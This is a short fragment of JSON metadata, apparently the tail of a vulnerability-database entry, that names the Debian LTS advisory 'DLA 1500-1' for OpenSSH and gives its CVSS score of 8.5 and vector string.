"[SECURITY] [DLA 1500-1] openssh security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}]}